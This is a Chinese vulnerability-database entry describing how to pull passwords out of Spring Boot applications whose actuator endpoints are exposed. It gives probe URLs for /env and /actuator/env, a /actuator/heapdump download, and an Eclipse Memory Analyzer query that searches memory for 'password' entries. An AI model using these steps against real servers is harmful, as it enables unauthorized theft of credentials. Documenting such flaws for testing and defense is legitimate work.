标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2021-2934]   作者: 须臾 发表于: [2021-09-22]

本文共 [5] 位读者顶过

Spring Boot 提取内存密码

 一、漏洞简介

 二、漏洞影响

 三、复现过程[出自:jiwo.org]

> 访问如下路径如果有数据说明存在漏洞

**Spring Boot 1.x版本**

`http://www.baidu.com:8090/env`

**Spring Boot 2.x版本**

`http://www.baidu.com:8090/actuator/env`

> 当发现存在未授权漏洞时,可以直接访问 `/actuator/heapdump` 下载内存,提取密码

`http://www.baidu.com:8090/actuator/heapdump`

> heapdump文件下载完成之后可以利用Eclipse Memory Analyzer 来解析内存文件

```
http://www.eclipse.org/mat/downloads.php

```

> 匹配内存中password字符串,并不一定能匹配完,可以通过`/actuator/env`得到的`JDBC`信息再来匹配关键字

`select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))`


评论

暂无
发表评论
 返回顶部 
热度(5)
 关注微信